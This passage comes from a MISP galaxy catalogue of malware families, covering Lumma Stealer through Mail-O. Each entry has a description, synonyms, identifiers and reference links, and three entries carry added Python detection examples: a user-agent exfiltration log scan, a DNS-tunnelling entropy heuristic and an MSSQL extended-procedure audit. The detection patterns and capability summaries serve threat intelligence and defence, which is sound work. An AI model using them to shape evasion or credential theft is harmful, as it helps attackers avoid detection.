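    found_posts, found_others = scan_log(SAMPLE_LOG)
    for h in found_posts:
        print(f"possible exfil: {h.client} {h.ts} POST {h.url} UA={h.user_agent}")
    for h in found_others:
        print(f"indicator UA on non-POST: {h.client} {h.url}")
```

A substring match is deliberate: malware families change version numbers in their fake user agents, so pinning the whole string would miss the next build. Treat a hit as a lead to pivot on the client and destination, not as a conviction on its own.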
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lumma Stealer.
Known Synonyms |
---|
LummaC2 Stealer |
Internal MISP references
UUID a14270e4-2b5e-4a90-9ccd-0b68690dbc3e
which can be used as unique global reference for Lumma Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma - webarchive
- https://denwp.com/anatomy-of-a-lumma-stealer/ - webarchive
- https://research.checkpoint.com/2024/stargazers-ghost-network/ - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx - webarchive
- https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ - webarchive
- https://denwp.com/dissecting-lumma-malware/ - webarchive
- https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/ - webarchive
- https://twitter.com/sekoia_io/status/1572889505497223169 - webarchive
- https://viuleeenz.github.io/posts/2024/03/understanding-api-hashing-and-build-a-rainbow-table-for-lummastealer/ - webarchive
- https://mandarnaik016.in/blog/2024-10-05-malware-analysis-lumma-stealer/ - webarchive
- https://gridinsoft.com/spyware/lumma-stealer - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
- https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed - webarchive
- https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ - webarchive
- https://twitter.com/fumik0_/status/1559474920152875008 - webarchive
- https://www.intrinsec.com/lumma_stealer_actively_deployed_in_multiple_campaigns/ - webarchive
- https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7 - webarchive
- https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer - webarchive
- https://www.esentire.com/blog/the-case-of-lummac2-v4-0 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn - webarchive
- https://censys.com/a-beginners-guide-to-hunting-open-directories/ - webarchive
- https://www.paloaltonetworks.com/blog/security-operations/a-deep-dive-into-malicious-direct-syscall-detection/ - webarchive
- https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ - webarchive
- https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pronsis-loader-a-jphp-driven-malware-diverging-from-d3fck-loader/ - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11 - webarchive
- https://www.trellix.com/blogs/research/how-attackers-repackaged-a-threat-into-something-that-looked-benign/ - webarchive
- https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer - webarchive
- https://www.malware-traffic-analysis.net/2024/03/07/index.html - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://insights.loaderinsight.agency/posts/vidar-build-id-correlation/ - webarchive
- https://www.0x1c.zip/0001-lummastealer/ - webarchive
- https://twitter.com/Ishusoka/status/1614028229307928582 - webarchive
- https://www.youtube.com/watch?v=lmMA4WYJEOY - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/ - webarchive
- https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LunarMail
According to ESET Research, this is an Outlook Add-In that can use email messages for its C&C communication.
Internal MISP references
UUID 2b489032-f4c5-4fe2-a4ac-d8223fff48b8
which can be used as unique global reference for LunarMail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LunchMoney
An uploader that can exfiltrate files to Dropbox.
Internal MISP references
UUID fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b
which can be used as unique global reference for LunchMoney
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lurk
Internal MISP references
UUID 929112e4-e252-4273-b3c2-fd414cfb2776
which can be used as unique global reference for Lurk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Luzo
Internal MISP references
UUID 8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2
which can be used as unique global reference for Luzo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lyceum .NET DNS Backdoor
This .NET written malware is used as a backdoor using the DNS protocol by a state sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing files/directories/installed applications, and uploading/downloading/execution of files). There are also variants using HTTP (.NET) and one written in Golang.
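The page says only that this backdoor carries its C2 over DNS, not how it encodes data, so a family-specific signature cannot be derived from it. What a defender can do with resolver logs is look for the traits every DNS-based C2 shares: many distinct, long, high-entropy subdomains under one parent domain from a single client. The block below is an added example of that generic heuristic (not code from the page, from Zscaler, or from the backdoor); the thresholds, the "parent = last two labels" shortcut (no public suffix list), and the sample queries are all assumptions constructed for the example.

```python
"""Generic DNS-tunnelling heuristic over resolver query logs.

Added example; not code from the original page, from Zscaler, or from the
Lyceum backdoor. The page does not describe the backdoor's DNS encoding,
so this relies on properties common to DNS-based C2 (many unique, long,
high-entropy subdomains under one parent) rather than on any family-specific
pattern. Thresholds and the parent-domain rule are assumptions.
"""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname):
    """Assume the registrable domain is the last two labels (no PSL lookup)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_parents(queries, min_unique=8, min_label_len=20, min_entropy=3.0):
    """Group queries by parent domain and return those that look like tunnels.

    queries: iterable of (client_ip, qname, qtype) tuples.
    A parent is flagged when it has at least min_unique distinct subdomain
    prefixes AND the leading label is, on average, long AND high-entropy.
    """
    per_parent = defaultdict(set)
    for _client, qname, _qtype in queries:
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # bare parent queries carry no payload label
        per_parent[parent_domain(qname)].add(".".join(labels[:-2]))

    flagged = {}
    for parent, prefixes in per_parent.items():
        leading = [p.split(".")[0] for p in prefixes]
        avg_len = sum(map(len, leading)) / len(leading)
        avg_ent = sum(map(shannon_entropy, leading)) / len(leading)
        if len(prefixes) >= min_unique and avg_len >= min_label_len and avg_ent >= min_entropy:
            flagged[parent] = {
                "unique": len(prefixes),
                "avg_len": round(avg_len, 1),
                "avg_entropy": round(avg_ent, 2),
            }
    return flagged


def _chunk(i):
    """Deterministic stand-in for an encoded payload chunk (constructed)."""
    return hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]


# Constructed sample: one host emitting encoded chunks under a single parent,
# one host doing ordinary lookups. Not real traffic.
SAMPLE_QUERIES = [("10.0.0.7", f"{_chunk(i)}.t{i}.update-cdn.example", "TXT") for i in range(12)]
SAMPLE_QUERIES += [("10.0.0.9", n, "A") for n in ("www.example.org", "mail.example.org", "cdn.example.org")]

if __name__ == "__main__":
    for parent, stats in score_parents(SAMPLE_QUERIES).items():
        print(f"possible DNS C2 under {parent}: {stats}")
```

Run this per source client as well as globally; a CDN or anti-spam service will also show many unique subdomains, but from many clients, and its labels are usually short or low-entropy. The TXT/NULL query type ratio per parent is a useful extra column when the logs carry it.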
Internal MISP references
UUID e7117036-5142-4a07-ae85-c3ddba7f1d75
which can be used as unique global reference for Lyceum .NET DNS Backdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lyceum_dns_backdoor_dotnet - webarchive
- https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor - webarchive
- https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lyceum .NET TCP Backdoor
This .NET written malware is used as a backdoor using the HTTP protocol by a state sponsored threat actor. It implements additional capabilities (e.g. execution of commands, taking screenshots, listing files/directories/installed applications, and uploading/downloading/execution of files). There are also variants using DNS (.NET) and one written in Golang.
Internal MISP references
UUID 92e533c5-b32a-411a-9fcc-733854c4a18c
which can be used as unique global reference for Lyceum .NET TCP Backdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lyceum Golang HTTP Backdoor
This Golang written malware is used as a backdoor using the HTTP protocol by a state sponsored threat actor (TA). This backdoor runs in a loop of three stages:
- Check the connectivity
- Registration of the victim
- Retrieval and execution of commands
This TA also uses .NET backdoor variants utilizing HTTP and DNS.
Internal MISP references
UUID 61fda7db-5e82-4e8c-a629-e8cc36151dec
which can be used as unique global reference for Lyceum Golang HTTP Backdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lyposit
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lyposit.
Known Synonyms |
---|
Adneukine |
Bomba Locker |
Lucky Locker |
Internal MISP references
UUID 0dea3e9d-b443-40f6-a9e0-ba622850ee8a
which can be used as unique global reference for Lyposit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit - webarchive
- https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/ - webarchive
- http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html - webarchive
- http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
M00nD3V Logger
According to Zscaler, M00nD3V Logger has the ability to steal confidential information, such as browser passwords, FTP client passwords, email client passwords, DynDNS credentials, JDownloader credentials; capture Windows keystrokes; and gain access to the webcam and hook the clipboard. In all, it has the ability to steal passwords from 42 applications.
Internal MISP references
UUID 737a73d5-40a2-4779-a84b-bdbefd1af4c9
which can be used as unique global reference for M00nD3V Logger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
m0yv
Modular x86/x64 file infector created/used by Maze ransomware developer. According to the author, it has been mistakenly tagged by AVs as Expiro.
Internal MISP references
UUID 73db5c33-c05c-4835-af4d-9223516b0915
which can be used as unique global reference for m0yv
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/ - webarchive
- https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py - webarchive
- https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py - webarchive
- https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html - webarchive
- https://youtu.be/3RYbkORtFnk - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MACAMAX
Internal MISP references
UUID 94dce4b9-69c9-4cc3-8377-dba04a162bc4
which can be used as unique global reference for MACAMAX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Macaw
Internal MISP references
UUID 523883ea-b865-4713-b5ed-bb1a808f35cf
which can be used as unique global reference for Macaw
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.macaw - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/ - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Machete
According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings. GoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence. Regarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL. The GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Machete.
Known Synonyms |
---|
El Machete |
Internal MISP references
UUID 9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff
which can be used as unique global reference for Machete
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.machete - webarchive
- https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf - webarchive
- https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html - webarchive
- https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html - webarchive
- https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america - webarchive
- https://securelist.com/el-machete/66108/ - webarchive
- https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/ - webarchive
- https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MadMax
Internal MISP references
UUID 42760c2c-bf00-4ace-871c-6dcbbd90b2de
which can be used as unique global reference for MadMax
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Magala
Internal MISP references
UUID 192f93bc-fcf6-4aaf-ae2f-d9435a67e48b
which can be used as unique global reference for Magala
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maggie
According to DCSO, this malware is written as an Extended Stored Procedure for a MSSQL server. The backdoor has capabilities to bruteforce logins to other MSSQL servers, adding a special hardcoded backdoor user in the case of successfully bruteforcing admin logins.
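Because the backdoor is registered as an extended stored procedure, the server's own catalog lists it next to the legitimate ones: sys.extended_procedures records each procedure and the DLL it loads. The block below is an added example (not code from the page or from DCSO) of auditing that list against a baseline. The T-SQL is a real catalog query; the baseline DLL names, the Binn path, and the sample rows are assumptions constructed for the example and must be replaced with a baseline taken from a known-clean instance of your own SQL Server version.

```python
"""Audit MSSQL extended stored procedures for an unexpected DLL.

Added example; not code from the original page or from DCSO. The T-SQL
queries sys.extended_procedures, a real catalog view. The baseline DLL
names, default Binn path and sample rows are assumptions for illustration,
not a vetted baseline for any SQL Server version.
"""

# Real catalog view: one row per extended stored procedure plus its DLL.
LIST_XPS_SQL = """
SELECT p.name, p.dll_name
FROM sys.extended_procedures AS p;
"""

# Assumed baseline: bare filenames of the DLLs a clean instance registers.
# Build this from a known-good server of the same version, not from here.
BASELINE_DLLS = ("xpstar.dll", "xplog70.dll")

# Assumed install path; adjust to the instance under review.
DEFAULT_BINN = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn"


def audit_extended_procs(rows, allowed_dlls, binn_dir=DEFAULT_BINN):
    """Return [(proc_name, dll_name, [reasons])] for rows that deviate from baseline.

    rows: iterable of (proc_name, dll_name) as returned by LIST_XPS_SQL.
    Two independent signals are checked: the DLL filename is not in the
    baseline, and/or the DLL is registered with an explicit path outside
    the server's Binn directory (built-ins are normally registered by bare
    filename and resolved from Binn).
    """
    allowed = {d.lower() for d in allowed_dlls}
    binn = binn_dir.replace("/", "\\").rstrip("\\").lower()
    findings = []
    for name, dll in rows:
        dll_win = dll.replace("/", "\\")
        directory, _, base = dll_win.rpartition("\\")
        reasons = []
        if base.lower() not in allowed:
            reasons.append("dll not in baseline")
        if directory and directory.rstrip("\\").lower() != binn:
            reasons.append("dll outside SQL Server Binn")
        if reasons:
            findings.append((name, dll, reasons))
    return findings


# Constructed sample rows (not from a real server).
SAMPLE_ROWS = [
    ("xp_regread", "xpstar.dll"),
    ("xp_cmdshell", "xplog70.dll"),
    ("xp_maintenance", r"C:\Windows\Temp\svc.dll"),  # hypothetical planted procedure
]

if __name__ == "__main__":
    for proc, dll, reasons in audit_extended_procs(SAMPLE_ROWS, BASELINE_DLLS):
        print(f"{proc}: {dll} -> {', '.join(reasons)}")
```

Feed the function the rows from LIST_XPS_SQL via whatever client you already use (sqlcmd output, pyodbc, etc.). A hit is a reason to hash and pull the DLL and to review the server's logins for accounts you did not create, since the description says the backdoor adds its own user after a successful brute force.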
Internal MISP references
UUID 2e4a63ab-9a04-472f-aad0-3eb4835a4697
which can be used as unique global reference for Maggie
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie - webarchive
- https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01 - webarchive
- https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/ - webarchive
- https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MagicRAT
According to Talos, MagicRAT is programmed in C++ programming language and uses the Qt Framework by statically linking it to the RAT on 32- and 64-bit versions. The Qt Framework is a programming library for developing graphical user interfaces, of which this RAT has none. Talos thinks that the objective was to increase the complexity of the code, thus making human analysis harder. On the other hand, since there are very few examples (if any) of malware programmed with Qt Framework, this also makes machine learning and heuristic analysis detection less reliable. The RAT uses the Qt classes throughout its entire code. The configuration is dynamically stored in a QSettings class eventually being saved to disk, a typical functionality provided by that class.
MagicRAT provides the operator with a remote shell on the victim's system for arbitrary command execution, along with the ability to rename, move and delete files on the endpoint. The operator can determine the timing for the implant to sleep, change the C2 URLs and delete the implant from the infected system.
Internal MISP references
UUID ace607fa-d2ad-4097-aa01-0aa748644b8e
which can be used as unique global reference for MagicRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html - webarchive
- https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/ - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://www.youtube.com/watch?v=nUjxH1gW53s - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Magniber
According to TXOne, the Magniber ransomware was first identified in late 2017 when it was discovered using the Magnitude Exploit Kit to conduct malvertising attacks against users in South Korea. It has remained active since then, continually updating its tactics by employing new obfuscation techniques and methods of evasion. In April 2022, Magniber gained notoriety for disguising itself as a Windows update file to lure victims into installing it. It then began spreading via JavaScript in September 2022.
Internal MISP references
UUID fedac411-0638-48dc-8ac5-1b4171fa8a29
which can be used as unique global reference for Magniber
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber - webarchive
- https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/ - webarchive
- https://asec.ahnlab.com/en/30645/ - webarchive
- https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/ - webarchive
- https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/ - webarchive
- https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/ - webarchive
- https://www.mandiant.com/resources/blog/magniber-ransomware-infects-only-the-right-people - webarchive
- https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/ - webarchive
- http://asec.ahnlab.com/1124 - webarchive
- https://www.youtube.com/watch?v=lqWJaaofNf4 - webarchive
- https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/ - webarchive
- https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/ - webarchive
- https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/ - webarchive
- https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/ - webarchive
- https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/ - webarchive
- https://asec.ahnlab.com/en/41889/ - webarchive
- https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372 - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware - webarchive
- https://www.malwarebytes.com/blog/news/2018/07/magniber-ransomware-improves-expands-within-asia - webarchive
- https://asec.ahnlab.com/en/19273/ - webarchive
- https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mailto
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mailto.
Known Synonyms |
---|
Koko Ransomware |
NetWalker |
Internal MISP references
UUID 722aab64-a02a-40fc-8c05-6b0344fad9b8
which can be used as unique global reference for Mailto
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://zengo.com/bitcoin-ransomware-detective-ucsf/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/ - webarchive
- https://zero2auto.com/2020/05/19/netwalker-re/ - webarchive
- https://www.youtube.com/watch?v=q8of74upT_g - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/ - webarchive
- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/ - webarchive
- https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game - webarchive
- https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million - webarchive
- https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/ - webarchive
- https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html - webarchive
- https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html - webarchive
- https://www.justice.gov/usao-mdfl/press-release/file/1360846/download - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/ - webarchive
- https://lopqto.me/posts/automated-dynamic-import-resolving - webarchive
- https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware - webarchive
- https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/ - webarchive
- https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/ - webarchive
- https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware - webarchive
- https://www.ic3.gov/media/news/2020/200929-2.pdf - webarchive
- https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/ - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/ - webarchive
- https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/ - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/ - webarchive
- https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware - webarchive
- https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mail-O
Internal MISP references
UUID d41f513c-97e2-4588-a669-aa93b6378ef1
which can be used as unique global reference for Mail-O
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o - webarchive
- https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/ - webarchive
- https://blog.group-ib.com/task - webarchive
- https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/ - webarchive
- https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op - webarchive
